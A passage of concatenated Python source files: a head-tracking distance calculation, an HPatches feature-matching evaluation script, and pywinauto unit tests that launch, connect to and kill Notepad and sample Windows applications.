leyey = int(results.multi_face_landmarks[0].landmark[263].y * shape[0])
eyewidth = math.sqrt((reyex-leyex)**2 + (reyey-leyey)**2) #Calculate pixel distance between left and right eyes
array_longi = np.array([nosetopx-nosebottomx, nosetopy-nosebottomy]) #Line between top and bottom of user's nose
array_trans = np.array([nosetopx-nosex, nosetopy-nosey])
# Use vector to calculate distance from point to line
array_temp = (float(array_trans.dot(array_longi)) / array_longi.dot(array_longi)) # Note that it is converted to floating-point arithmetic
array_temp = array_longi.dot(array_temp) #get the distance from the top/bottom nose line to the tip of the nose
eyenose = eyewidth + np.sqrt((array_trans - array_temp).dot(array_trans - array_temp)) #add the square root of the nose tip from centerline distance to the eye width calculated earlier, this helps offset eye width shrinking from the user turning their head left/right
distance = userHead/eyenose #finally convert our pixel values to inches, it's very important userHead is calibrated for distances to be accurate
#print(distance) #uncomment this to see the distance value in real time, useful for determining userHead value.
headx = (math.tan(math.radians(eyesh)) * distance) #convert angles to user head coordinates
heady = ((math.tan(math.radians(eyesv)) * distance) - cameraOffset)*-1 #invert y value to ensure coords make sense
self.headxyz = [headx, heady, distance, time.time()] #output head xyz coordinates and timestamp
return self.headxyz
#return self.tracking
def stop(self):
self.stopped = True
|
hseq_eval.py | #!/usr/bin/env python3
"""
Copyright 2017, Zixin Luo, HKUST.
Inference script.
"""
import os
from queue import Queue
from threading import Thread
import math
import yaml
import cv2
import numpy as np
import tensorflow as tf
from models import get_model
from utils.hseq_utils import HSeqUtils
from utils.evaluator import Evaluator
FLAGS = tf.compat.v1.app.flags.FLAGS
# general config.
tf.compat.v1.app.flags.DEFINE_string('config', None, """Path to the configuration file.""")
def loader(hseq_utils, producer_queue):
for seq_idx in range(hseq_utils.seq_num):
seq_name, hseq_data = hseq_utils.get_data(seq_idx)
for i in range(6):
gt_homo = [seq_idx, seq_name, hseq_data.scaling] if i == 0 else hseq_data.homo[i]
producer_queue.put([hseq_data.img[i], gt_homo])
producer_queue.put(None)
def extractor(patch_queue, model, consumer_queue):
while True:
queue_data = patch_queue.get()
if queue_data is None:
consumer_queue.put(None)
return
img, gt_homo = queue_data
gray = cv2.cvtColor(img, cv2.COLOR_BGR2GRAY)
H, W = gray.shape
descs, kpts, _ = model.run_test_data(np.expand_dims(gray, axis=-1))
consumer_queue.put([img, kpts, descs, gt_homo])
patch_queue.task_done()
def matcher(consumer_queue, sess, evaluator, config):
record = []
while True:
queue_data = consumer_queue.get()
if queue_data is None:
return
record.append(queue_data)
if len(record) < 6:
continue
ref_img, ref_kpts, ref_descs, seq_info = record[0]
eval_stats = np.array((0, 0, 0, 0, 0, 0, 0, 0), np.float32)
seq_idx = seq_info[0]
seq_name = seq_info[1]
scaling = seq_info[2]
print(seq_idx, seq_name)
for i in range(1, 6):
test_img, test_kpts, test_descs, gt_homo = record[i]
# get MMA
num_feat = min(ref_kpts.shape[0], test_kpts.shape[0])
if num_feat > 0:
mma_putative_matches = evaluator.feature_matcher(
sess, ref_descs, test_descs)
else:
mma_putative_matches = []
mma_inlier_matches = evaluator.get_inlier_matches(
ref_kpts, test_kpts, mma_putative_matches, gt_homo, scaling)
num_mma_putative = len(mma_putative_matches)
num_mma_inlier = len(mma_inlier_matches)
# get covisible keypoints
ref_mask, test_mask = evaluator.get_covisible_mask(ref_kpts, test_kpts,
ref_img.shape, test_img.shape,
gt_homo, scaling)
cov_ref_coord, cov_test_coord = ref_kpts[ref_mask], test_kpts[test_mask]
cov_ref_feat, cov_test_feat = ref_descs[ref_mask], test_descs[test_mask]
num_cov_feat = (cov_ref_coord.shape[0] + cov_test_coord.shape[0]) / 2
# get gt matches
gt_num = evaluator.get_gt_matches(cov_ref_coord, cov_test_coord, gt_homo, scaling)
# establish putative matches
if num_cov_feat > 0:
putative_matches = evaluator.feature_matcher(
sess, cov_ref_feat, cov_test_feat)
else:
putative_matches = []
num_putative = max(len(putative_matches), 1)
# get homography accuracy
correctness = evaluator.compute_homography_accuracy(cov_ref_coord, cov_test_coord, ref_img.shape, putative_matches, gt_homo, scaling)
# get inlier matches
inlier_matches = evaluator.get_inlier_matches(
cov_ref_coord, cov_test_coord, putative_matches, gt_homo, scaling)
num_inlier = len(inlier_matches)
eval_stats += np.array((1, # counter
num_feat, # feature number
gt_num / max(num_cov_feat, 1), # repeatability
num_inlier / max(num_putative, 1), # precision
num_inlier / max(num_cov_feat, 1), # matching score
num_inlier / max(gt_num, 1), # recall
num_mma_inlier / max(num_mma_putative, 1),
correctness)) / 5 # MMA
print(int(eval_stats[1]), eval_stats[2:])
evaluator.stats['all_eval_stats'] += eval_stats
if os.path.basename(seq_name)[0] == 'i':
evaluator.stats['i_eval_stats'] += eval_stats
if os.path.basename(seq_name)[0] == 'v':
evaluator.stats['v_eval_stats'] += eval_stats
record = []
def hseq_eval():
with open(FLAGS.config, 'r') as f:
test_config = yaml.load(f, Loader=yaml.FullLoader)
# Configure dataset
hseq_utils = HSeqUtils(test_config['hseq'])
# Configure evaluation
evaluator = Evaluator(test_config['eval'])
# Construct inference networks.
model = get_model('feat_model')(test_config['model_path'], **(test_config['net']))
# Create the initializier.
config = tf.compat.v1.ConfigProto()
config.gpu_options.allow_growth = True
producer_queue = Queue(maxsize=18)
consumer_queue = Queue()
producer0 = Thread(target=loader, args=(hseq_utils, producer_queue))
producer0.daemon = True
producer0.start()
producer1 = Thread(target=extractor, args=(producer_queue, model, consumer_queue))
producer1.daemon = True
producer1.start()
consumer = Thread(target=matcher, args=(consumer_queue, model.sess, evaluator, test_config['eval']))
consumer.daemon = True
consumer.start()
producer0.join()
producer1.join()
consumer.join()
evaluator.print_stats('i_eval_stats')
evaluator.print_stats('v_eval_stats')
evaluator.print_stats('all_eval_stats')
if __name__ == '__main__':
tf.compat.v1.flags.mark_flags_as_required(['config'])
hseq_eval()
|
test_application.py | # GUI Application automation and testing library
# Copyright (C) 2006-2018 Mark Mc Mahon and Contributors
# https://github.com/pywinauto/pywinauto/graphs/contributors
# http://pywinauto.readthedocs.io/en/latest/credits.html
# All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are met:
#
# * Redistributions of source code must retain the above copyright notice, this
# list of conditions and the following disclaimer.
#
# * Redistributions in binary form must reproduce the above copyright notice,
# this list of conditions and the following disclaimer in the documentation
# and/or other materials provided with the distribution.
#
# * Neither the name of pywinauto nor the names of its
# contributors may be used to endorse or promote products derived from
# this software without specific prior written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS"
# AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
# IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE
# DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE
# FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL
# DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR
# SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER
# CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY,
# OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
# OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
#pylint: disable-msg=C0301
#pylint: disable-msg=F0401
#pylint: disable-msg=W0142
"""Tests for application.py"""
import sys
import os
import unittest
import time
#import pprint
#import pdb
import warnings
from threading import Thread
import ctypes
import mock
import six
sys.path.append(".")
from pywinauto import Desktop
from pywinauto.windows import application, win32defines
from pywinauto.controls import hwndwrapper
from pywinauto.windows.application import Application
from pywinauto.base_application import WindowSpecification # noqa: E402
from pywinauto.windows.application import process_module
from pywinauto.windows.application import process_get_modules
from pywinauto.windows.application import ProcessNotFoundError
from pywinauto.windows.application import AppStartError
from pywinauto.windows.application import AppNotConnected
from pywinauto.controls.common_controls import TrackbarWrapper
from pywinauto import findwindows
from pywinauto import findbestmatch
from pywinauto.timings import Timings
from pywinauto.timings import TimeoutError
from pywinauto.timings import WaitUntil
from pywinauto.timings import always_wait_until
from pywinauto.timings import always_wait_until_passes
from pywinauto.timings import timestamp # noqa: E402
from pywinauto.sysinfo import is_x64_Python
from pywinauto.sysinfo import is_x64_OS
from pywinauto.sysinfo import UIA_support
#application.set_timing(1, .01, 1, .01, .05, 0, 0, .1, 0, .01)
# About dialog may take some time to load
# so make sure that we wait for it.
Timings.window_find_timeout = 5
def _notepad_exe():
if is_x64_Python() or not is_x64_OS():
return r"C:\Windows\System32\notepad.exe"
else:
return r"C:\Windows\SysWOW64\notepad.exe"
mfc_samples_folder_32 = mfc_samples_folder = os.path.join(
os.path.dirname(__file__), r"..\..\apps\MFC_samples")
if is_x64_Python():
mfc_samples_folder = os.path.join(mfc_samples_folder, 'x64')
class ApplicationWarningTestCases(unittest.TestCase):
"""Unit tests for warnings in the application.Application class"""
def setUp(self):
"""Set some data and ensure the application is in the state we want"""
Timings.defaults()
# Force Display User and Deprecation warnings every time
# Python 3.3 + nose/unittest tries really hard to suppress them
for warning in (UserWarning, PendingDeprecationWarning):
warnings.simplefilter('always', warning)
if is_x64_Python():
self.sample_exe = os.path.join(mfc_samples_folder,
"CmnCtrl1.exe")
self.sample_exe_inverted_bitness = os.path.join(mfc_samples_folder_32,
"CmnCtrl1.exe")
else:
self.sample_exe = os.path.join(mfc_samples_folder_32, "CmnCtrl1.exe")
self.sample_exe_inverted_bitness = os.path.join(mfc_samples_folder,
"x64",
"CmnCtrl1.exe")
def testStartWarning3264(self):
if not is_x64_OS():
self.defaultTestResult()
return
warnings.filterwarnings('always', category=UserWarning, append=True)
with warnings.catch_warnings(record=True) as w:
warnings.simplefilter("always")
app = Application().start(self.sample_exe_inverted_bitness)
app.kill()
assert len(w) >= 1
assert issubclass(w[-1].category, UserWarning)
assert "64-bit" in str(w[-1].message)
def testConnectWarning3264(self):
if not is_x64_OS():
self.defaultTestResult()
return
app = Application().start(self.sample_exe_inverted_bitness)
# Appveyor misteries...
self.assertEqual(app.is_process_running(), True)
with mock.patch("warnings.warn") as mockWarn:
Application().connect(pid=app.process)
app.kill()
args, kw = mockWarn.call_args
assert len(args) == 2
assert "64-bit" in args[0]
assert args[1].__name__ == 'UserWarning'
class ApplicationWin32KillTestCases(unittest.TestCase):
"""Unit tests for method Application.kill() with backend='win32'"""
backend = 'win32'
def setUp(self):
"""Set some data and ensure the application is in the state we want"""
Timings.defaults()
self.sample_exe = os.path.join(mfc_samples_folder, 'RowList.exe')
self.app = Application(backend=self.backend).start(self.sample_exe)
self.target_process = self.app.process
def tearDown(self):
self.app.kill(soft=False)
def test_kill_hard(self):
self.assertTrue(self.app.kill(soft=False))
self.assertRaises(ProcessNotFoundError, Application().connect, pid=self.target_process)
def test_kill_soft(self):
self.assertTrue(self.app.kill(soft=True))
self.assertRaises(ProcessNotFoundError, Application().connect, pid=self.target_process)
def test_already_killed_hard(self):
self.assertTrue(self.app.kill(soft=False))
self.assertRaises(ProcessNotFoundError, Application().connect, pid=self.target_process)
self.assertTrue(self.app.kill(soft=False)) # already killed, returned True anyway
def test_already_killed_soft(self):
self.assertTrue(self.app.kill(soft=False))
self.assertRaises(ProcessNotFoundError, Application().connect, pid=self.target_process)
self.assertTrue(self.app.kill(soft=True)) # already killed, returned True anyway
def test_kill_soft_with_modal_subdialog(self):
"""Kill the app with modal subdialog to cover win.force_close() call"""
self.app.RowListSampleApplication.menu_select('Help->About RowList...')
if self.backend == 'win32':
self.app.window(name='About RowList').wait('visible')
elif self.backend == 'uia':
self.app.RowListSampleApplication.by(name='About RowList').wait('visible')
else:
raise NotImplementedError('test_kill_soft_with_modal_subdialog: ' \
'backend "{}" is not supported'.format(self.backend))
self.assertTrue(self.app.kill(soft=True))
self.assertRaises(ProcessNotFoundError, Application().connect, pid=self.target_process)
self.assertTrue(self.app.kill(soft=True)) # already killed, returned True anyway
if UIA_support:
class ApplicationUiaKillTestCases(ApplicationWin32KillTestCases):
"""Unit tests for method Application.kill() with backend='uia'"""
backend = 'uia'
# the same test methods run here
if ctypes.windll.shell32.IsUserAnAdmin() == 0:
class AdminTestCases(ApplicationWarningTestCases):
def setUp(self):
"""Set some data and ensure the application is in the state we want"""
super(AdminTestCases, self).setUp()
cmd = 'powershell -Command "Start-Process {} -Verb RunAs"'.format(self.sample_exe)
self.app = Application().start(cmd, wait_for_idle=False)
def tearDown(self):
"""Close the application after tests"""
self.app.kill()
super(AdminTestCases, self).tearDown()
def test_non_admin_warning(self):
warnings.filterwarnings('always', category=UserWarning, append=True)
with warnings.catch_warnings(record=True) as w:
warnings.simplefilter("always")
self.app = Application().connect(name="Common Controls Sample", timeout=20)
assert len(w) >= 1
assert issubclass(w[-1].category, UserWarning)
assert "process has no rights" in str(w[-1].message)
def test_non_admin_click(self):
self.app = Application().connect(name="Common Controls Sample", timeout=20)
with self.assertRaises(RuntimeError):
self.app.CommonControlsSample.OK.click()
with self.assertRaises(RuntimeError):
self.app.CommonControlsSample.OK.click_input()
with self.assertRaises(RuntimeError):
self.app.CommonControlsSample.TVS_HASBUTTON.check()
class NonAdminTestCases(ApplicationWarningTestCases):
def setUp(self):
"""Set some data and ensure the application is in the state we want"""
super(NonAdminTestCases, self).setUp()
self.app = Application().start(self.sample_exe)
def tearDown(self):
"""Close the application after tests"""
self.app.kill()
super(NonAdminTestCases, self).tearDown()
def test_both_non_admin(self):
warnings.filterwarnings('always', category=UserWarning, append=True)
with warnings.catch_warnings(record=True) as w:
warnings.simplefilter("always")
self.app = Application().connect(name="Common Controls Sample", timeout=5)
assert len(w) == 0
def test_both_non_admin_click(self):
self.app = Application().connect(name="Common Controls Sample", timeout=5)
self.app.CommonControlsSample.TVS_HASBUTTON.check()
self.assertEqual(self.app.CommonControlsSample.TVS_HASBUTTON.is_checked(), True)
self.app.CommonControlsSample.OK.click()
self.app.CommonControlsSample.wait_not('visible')
class ApplicationTestCases(unittest.TestCase):
"""Unit tests for the application.Application class"""
def setUp(self):
"""Set some data and ensure the application is in the state we want"""
Timings.defaults()
self.prev_warn = warnings.showwarning
def no_warnings(*args, **kwargs): pass
warnings.showwarning = no_warnings
if is_x64_Python() or not is_x64_OS():
self.notepad_subpath = r"system32\notepad.exe"
else:
self.notepad_subpath = r"SysWOW64\notepad.exe"
def tearDown(self):
"""Close the application after tests"""
#self.dlg.SendMessage(win32defines.WM_CLOSE)
warnings.showwarning = self.prev_warn
def test__init__(self):
"""Verify that Application instance is initialized or not"""
self.assertRaises(ValueError, Application, backend='unregistered')
def test__iter__(self):
"""Verify that Application instance is not iterable"""
app = Application()
app.start(_notepad_exe())
with self.assertRaises(NotImplementedError):
for a in app:
pass
app.kill()
def test_not_connected(self):
"""Verify that it raises when the app is not connected"""
self.assertRaises (AppNotConnected, Application().__getattribute__, 'Hiya')
self.assertRaises (AppNotConnected, Application().__getitem__, 'Hiya')
self.assertRaises (AppNotConnected, Application().window_, name='Hiya')
self.assertRaises (AppNotConnected, Application().top_window_,)
def test_start_problem(self):
"""Verify start_ raises on unknown command"""
self.assertRaises (AppStartError, Application().start, 'Hiya')
def test_start(self):
"""test start() works correctly"""
app = Application()
self.assertEqual(app.process, None)
app.start(_notepad_exe())
self.assertNotEqual(app.process, None)
self.assertEqual(app.UntitledNotepad.process_id(), app.process)
notepadpath = os.path.join(os.environ['systemroot'], self.notepad_subpath)
self.assertEqual(str(process_module(app.process)).lower(), str(notepadpath).lower())
app.UntitledNotepad.menu_select("File->Exit")
def testStart_bug01(self):
"""On SourceForge forum AppStartError forgot to include %s for application name"""
app = Application()
self.assertEqual(app.process, None)
application.app_start_timeout = 1
app_name = r"I am not * and Application!/\.exe"
try:
app.start(app_name)
except AppStartError as e:
self.assertEqual(app_name in str(e), True)
# def testset_timing(self):
# """Test that set_timing sets the timing correctly"""
# prev_timing = (
# application.window_find_timeout,
# application.window_retry_interval,
# application.app_start_timeout,
# application.exists_timeout,
# application.exists_retry_interval,
# hwndwrapper.delay_after_click,
# hwndwrapper.delay_after_menuselect,
# hwndwrapper.delay_after_sendkeys_key,
# hwndwrapper.delay_after_button_click,
# hwndwrapper.delay_before_after_close_click,
# )
# set_timing(1, 2, 3, 4, 5, 6, 7, 8, 9, 10)
#
# self.assertEqual(
# (
# application.window_find_timeout,
# application.window_retry_interval,
# application.app_start_timeout,
# application.exists_timeout,
# application.exists_retry_interval,
# hwndwrapper.delay_after_click,
# hwndwrapper.delay_after_menuselect,
# hwndwrapper.delay_after_sendkeys_key,
# hwndwrapper.delay_after_button_click,
# hwndwrapper.delay_before_after_close_click,
# ), (1, 2, 3, 4, 5, 6, 7, 8, 9, 10) )
#
# set_timing(*prev_timing)
def test_connect_path(self):
"""Test that connect_() works with a path"""
app1 = Application()
app1.start(_notepad_exe())
app_conn = Application()
app_conn.connect(path=self.notepad_subpath)
self.assertEqual(app1.process, app_conn.process)
app_conn = Application()
if is_x64_Python() or not is_x64_OS():
app_conn.connect(path=r"c:\windows\system32\notepad.exe")
else:
app_conn.connect(path=r"c:\windows\syswow64\notepad.exe")
self.assertEqual(app1.process, app_conn.process)
accessible_modules = process_get_modules()
accessible_process_names = [os.path.basename(name.lower()) for process, name, cmdline in accessible_modules]
self.assertEqual('notepad.exe' in accessible_process_names, True)
app_conn.UntitledNotepad.menu_select('File->Exit')
def test_connect_path_timeout(self):
"""Test that connect_() works with a path with timeout"""
app1 = Application()
def delayed_launch():
time.sleep(2)
app1.start(_notepad_exe())
thread = Thread(target=delayed_launch)
thread.start()
app_conn = Application()
app_conn.connect(path=_notepad_exe(), timeout=3)
self.assertEqual(app1.process, app_conn.process)
accessible_modules = process_get_modules()
accessible_process_names = [os.path.basename(name.lower()) for process, name, cmdline in accessible_modules]
self.assertEqual('notepad.exe' in accessible_process_names, True)
app1.UntitledNotepad.menu_select('File->Exit')
def test_connect_path_timeout_problem(self):
"""Test that connect_() raise error when no process start"""
app1 = Application()
def delayed_launch():
time.sleep(1)
app1.start(_notepad_exe())
thread = Thread(target=delayed_launch)
thread.start()
self.assertRaises(ProcessNotFoundError, Application().connect, path=_notepad_exe(), timeout=0.5)
time.sleep(0.7)
app1.UntitledNotepad.menu_select('File->Exit')
def test_connect_process_timeout_failed(self):
"""Test that connect_(pid=...) raise error when set timeout"""
app1 = Application()
app1.start(_notepad_exe())
self.assertRaises(ProcessNotFoundError, Application().connect, pid=0, timeout=0.5)
app1.UntitledNotepad.menu_select('File->Exit')
# def test_Connect(self):
# """Test that connect_() works with a path"""
# app1 = Application()
# app1.start_("notepad.exe")
#
# app_conn = Application()
# app_conn.connect_(path = r"system32\notepad.exe")
# self.assertEqual(app1.process, app_conn.process)
#
# app_conn = Application()
# app_conn.connect_(path = r"c:\windows\system32\notepad.exe")
# self.assertEqual(app1.process, app_conn.process)
#
# app_conn.UntitledNotepad.menu_select('File->Exit')
def test_connect_process(self):
"""Test that connect_() works with a process"""
app1 = Application()
app1.start(_notepad_exe())
app_conn = Application()
app_conn.connect(pid=app1.process)
self.assertEqual(app1.process, app_conn.process)
app_conn.UntitledNotepad.menu_select('File->Exit')
def test_connect_handle(self):
"""Test that connect_() works with a handle"""
app1 = Application()
app1.start(_notepad_exe())
handle = app1.UntitledNotepad.handle
app_conn = Application()
app_conn.connect(handle=handle)
self.assertEqual(app1.process, app_conn.process)
app_conn.UntitledNotepad.menu_select('File->Exit')
def test_connect_windowspec(self):
"""Test that connect_() works with a windowspec"""
app1 = Application()
app1.start(_notepad_exe())
#unused var: handle = app1.UntitledNotepad.handle
app_conn = Application()
try:
app_conn.connect(name="Untitled - Notepad")
except findwindows.WindowAmbiguousError:
wins = findwindows.find_elements(active_only=True, name="Untitled - Notepad")
app_conn.connect(handle = wins[0].handle)
except findwindows.ElementNotFoundError:
WaitUntil(30, 0.5, lambda: len(findwindows.find_elements(active_only=True, name="Untitled - Notepad")) > 0)
wins = findwindows.find_elements(active_only=True, name="Untitled - Notepad")
app_conn.connect(handle = wins[0].handle)
self.assertEqual(app1.process, app_conn.process)
app_conn.UntitledNotepad.menu_select('File->Exit')
def test_connect_raises(self):
"""Test that connect_() raises with invalid input"""
# try an argument that does not exist
self.assertRaises (
KeyError,
Application().connect, **{'not_arg': 23})
self.assertRaises (
RuntimeError,
Application().connect)
# try to pass an invalid process
self.assertRaises (
ProcessNotFoundError,
Application().connect, **{'pid': 0})
# try to pass an invalid handle
self.assertRaises(
RuntimeError,
Application().connect, **{'handle' : 0})
# try to pass an invalid path
self.assertRaises(
ProcessNotFoundError,
Application().connect, **{'path': "no app here", 'timeout': 0.0})
def test_top_window(self):
"""Test that top_window_() works correctly"""
Timings.window_find_timeout = 5
app = Application()
self.assertRaises(AppNotConnected, app.top_window_)
app.start(_notepad_exe())
self.assertEqual(app.UntitledNotepad.handle, app.top_window_().handle)
app.UntitledNotepad.menu_select("Help->About Notepad")
self.assertEqual(app.AboutNotepad.handle, app.top_window_().handle)
app.AboutNotepad.Ok.Click()
app.UntitledNotepad.menu_select("File->Exit")
app.UntitledNotepad.wait_not('exists')
self.assertRaises(RuntimeError, app.top_window_)
def test_active_window(self):
"""Test that active_() works correctly"""
app = Application()
self.assertRaises(AppNotConnected, app.active_)
self.assertRaises(AppNotConnected, app.is64bit)
app.start(_notepad_exe())
app.UntitledNotepad.wait('ready')
self.assertEqual(app.active_().handle, app.UntitledNotepad.handle)
app.UntitledNotepad.menu_select("File->Exit")
app.UntitledNotepad.wait_not('exists')
self.assertRaises(RuntimeError, app.active_)
def test_cpu_usage(self):
"""Verify that cpu_usage() works correctly"""
app = Application()
self.assertRaises(AppNotConnected, app.cpu_usage)
app.start(_notepad_exe())
self.assertEqual(0.0 <= app.cpu_usage() <= 100.0, True)
app.UntitledNotepad.menu_select("File->Exit")
app.UntitledNotepad.wait_not('exists')
def test_wait_cpu_usage_lower(self):
"""Test that wait_cpu_usage_lower() works correctly"""
if is_x64_Python() != is_x64_OS():
return None
Application().Start(r'explorer.exe')
def _cabinetwclass_exist():
"Verify if at least one active 'CabinetWClass' window is created"
l = findwindows.find_elements(active_only = True, class_name = 'CabinetWClass')
return (len(l) > 0)
WaitUntil(40, 0.5, _cabinetwclass_exist)
handle = findwindows.find_elements(active_only = True, class_name = 'CabinetWClass')[-1].handle
window = WindowSpecification({'handle': handle, 'backend': 'win32', })
explorer = Application().Connect(pid = window.process_id())
try:
explorer.WaitCPUUsageLower(threshold = 1.5, timeout = 60, usage_interval = 2)
window.AddressBandRoot.ClickInput()
window.TypeKeys(r'Control Panel\Programs\Programs and Features', with_spaces=True, set_foreground=True)
window.TypeKeys(r'{ENTER}', set_foreground = False)
WaitUntil(40, 0.5, lambda: len(findwindows.find_elements(active_only=True,
name='Programs and Features',
class_name='CabinetWClass')) > 0)
explorer.WaitCPUUsageLower(threshold = 1.5, timeout = 60, usage_interval = 2)
installed_programs = window.FolderView.texts()[1:]
programs_list = ','.join(installed_programs)
if ('Microsoft' not in programs_list) and ('Python' not in programs_list):
hwndwrapper.ImageGrab.grab().save(r'explorer_screenshot.jpg')
hwndwrapper.ActionLogger().log('\ninstalled_programs:\n')
for prog in installed_programs:
hwndwrapper.ActionLogger().log(prog)
self.assertEqual(('Microsoft' in programs_list) or ('Python' in programs_list), True)
finally:
window.Close(2.0)
if UIA_support:
def test_wait_cpu_usage_lower_uia(self):
"""Test that wait_cpu_usage_lower() works correctly for UIA"""
app = Application(backend='uia')
app.start('notepad.exe')
try:
app.wait_cpu_usage_lower(threshold = 1.5, timeout = 30, usage_interval = 2)
finally:
app.kill()
app.cpu_usage = mock.Mock(return_value=10)
self.assertRaises(
RuntimeError, app.wait_cpu_usage_lower,
threshold = 9.0, timeout = 5, usage_interval = 0.5
)
# def test_wait_for_idle_exception(self):
# """Test that method start() raises an exception when wait for idle failed"""
# app = Application()
# self.assertRaises(Exception, app.start, 'cmd.exe')
# # TODO: test and fix the case when cmd.exe can't be killed by app.kill()
def test_windows(self):
"""Test that windows_() works correctly"""
Timings.window_find_timeout = 5
app = Application()
self.assertRaises(AppNotConnected, app.windows_, **{'title' : 'not connected'})
app.start('notepad.exe')
self.assertRaises(ValueError, app.windows_, **{'backend' : 'uia'})
notepad_handle = app.UntitledNotepad.handle
self.assertEqual(app.windows(visible=True), [notepad_handle])
app.UntitledNotepad.menu_select("Help->About Notepad")
aboutnotepad_handle = app.AboutNotepad.handle
self.assertEqual(
app.windows(visible=True, enabled=None),
[aboutnotepad_handle, notepad_handle])
app.AboutNotepad.OK.Click()
app.UntitledNotepad.menu_select("File->Exit")
def test_window(self):
"""Test that window_() works correctly"""
app = Application()
self.assertRaises(AppNotConnected, app.window_, **{'title' : 'not connected'})
app.start(_notepad_exe())
self.assertRaises(ValueError, app.windows_, **{'backend' : 'uia'})
title = app.window(name="Untitled - Notepad")
title_re = app.window(name_re="Untitled[ -]+Notepad")
classname = app.window(class_name="Notepad")
classname_re = app.window(class_name_re="Not..ad")
handle = app.window(handle=title.handle)
bestmatch = app.window(best_match="Untiotled Notepad")
self.assertNotEqual(title.handle, None)
self.assertNotEqual(title.handle, 0)
self.assertEqual(title.handle, title_re.handle)
self.assertEqual(title.handle, classname.handle)
self.assertEqual(title.handle, classname_re.handle)
self.assertEqual(title.handle, handle.handle)
self.assertEqual(title.handle, bestmatch.handle)
app.UntitledNotepad.menu_select("File->Exit")
def test_getitem(self):
"""Test that __getitem__() works correctly"""
Timings.window_find_timeout = 5
app = Application()
app.start(_notepad_exe())
self.assertRaises(Exception, app['blahblah'])
self.assertRaises(
findbestmatch.MatchError,
app['blahblah']['not here'].__getitem__, 'handle')
self.assertEqual(
app[u'Unt\xeftledNotepad'].handle,
app.window(name="Untitled - Notepad").handle)
app.UntitledNotepad.menu_select("Help->About Notepad")
self.assertEqual(
app['AboutNotepad'].handle,
app.window(name="About Notepad").handle)
app.AboutNotepad.Ok.Click()
app.UntitledNotepad.menu_select("File->Exit")
def test_getattribute(self):
"""Test that __getattribute__() works correctly"""
Timings.window_find_timeout = 5
app = Application()
app.start(_notepad_exe())
self.assertRaises(
findbestmatch.MatchError,
app.blahblah.__getattribute__, 'handle')
self.assertEqual(
app.UntitledNotepad.handle,
app.window(name="Untitled - Notepad").handle)
app.UntitledNotepad.menu_select("Help->About Notepad")
# I think it's OK that this no longer raises a matcherror
# just because the window is not enabled - doesn't mean you
# should not be able to access it at all!
#self.assertRaises(findbestmatch.MatchError,
# app.Notepad.__getattribute__, 'handle')
self.assertEqual(
app.AboutNotepad.handle,
app.window(name="About Notepad").handle)
app.AboutNotepad.Ok.Click()
app.UntitledNotepad.menu_select("File->Exit")
def test_kill(self):
"""test killing the application"""
app = Application()
app.start(_notepad_exe())
app.UntitledNotepad.Edit.type_keys("hello")
app.UntitledNotepad.menu_select("File->Print...")
#app.Print.FindPrinter.Click() # Vasily: (Win7 x64) "Find Printer" dialog is from splwow64.exe process
#app.FindPrinters.Stop.Click()
app.kill()
self.assertRaises(AttributeError, app.UntitledNotepad.Edit)
def test_process_is_running(self):
"""Tests process is running and wait for exit function"""
app = Application()
app.start(_notepad_exe())
app.UntitledNotepad.wait("ready")
self.assertTrue(app.is_process_running())
self.assertRaises(TimeoutError, lambda: app.wait_for_process_exit(timeout=5, retry_interval=1))
app.kill()
app.wait_for_process_exit()
self.assertFalse(app.is_process_running())
def test_should_return_not_running_if_not_started(self):
"""Tests that works on new instance
is_process_running/wait_for_process_exit can be called on not started/disconnected instance
"""
app = Application()
app.wait_for_process_exit(timeout=10, retry_interval=1)
self.assertFalse(app.is_process_running())
class TestInheritedApp(Application):
"""Our inherited version of class"""
def test_method(self):
"""This method should be called without any issues"""
return self is not None
def test_application_inheritance(self):
"""Test that Application class can be inherited and has it's own methods"""
app = ApplicationTestCases.TestInheritedApp()
self.assertTrue(app.test_method())
def test_non_magic_application(self):
app = Application()
self.assertEqual(app.allow_magic_lookup, True)
app_no_magic = Application(allow_magic_lookup=False)
self.assertEqual(app_no_magic.allow_magic_lookup, False)
app_no_magic.start(_notepad_exe())
window = app_no_magic.window(best_match="UntitledNotepad")
dlg = window.by(best_match="Edit")
dlg.draw_outline()
with self.assertRaises(AttributeError):
app_no_magic.UntitledNotepad
with self.assertRaises(AttributeError):
window.Edit
app_no_magic.kill()
app_no_magic.wait_for_process_exit()
class WindowSpecificationTestCases(unittest.TestCase):
"""Unit tests for the application.Application class"""
def setUp(self):
"""Set some data and ensure the application is in the state we want"""
Timings.defaults()
self.app = Application(backend="win32").start(_notepad_exe())
self.dlgspec = self.app.UntitledNotepad
self.ctrlspec = self.app.UntitledNotepad.Edit
def tearDown(self):
"""Close the application after tests"""
# close the application
#self.app.UntitledNotepad.menu_select("File->Exit")
self.app.kill()
def test__init__(self):
"""Test creating a new spec by hand"""
wspec = WindowSpecification(
dict(
best_match=u"UntitledNotepad",
app=self.app)
)
self.assertEqual(
wspec.window_text(),
u"Untitled - Notepad")
self.assertEqual(self.dlgspec.app, self.app)
self.assertEqual(self.ctrlspec.app, self.app)
self.assertEqual(wspec.app, self.app)
def test__init__both_keywords(self):
"""Test creating a new spec with ambiguity by process and app simultaneously"""
self.assertRaises(KeyError, WindowSpecification,
dict(best_match=u"UntitledNotepad", app=self.app, pid=self.app.process)
)
def test__call__(self):
"""Test that __call__() correctly raises an error"""
self.assertRaises(AttributeError, self.dlgspec)
self.assertRaises(AttributeError, self.ctrlspec)
# no best_match!
wspec = WindowSpecification(
dict(name=u"blah", app=self.app)
)
self.assertRaises(AttributeError, wspec)
def test_wrapper_object(self):
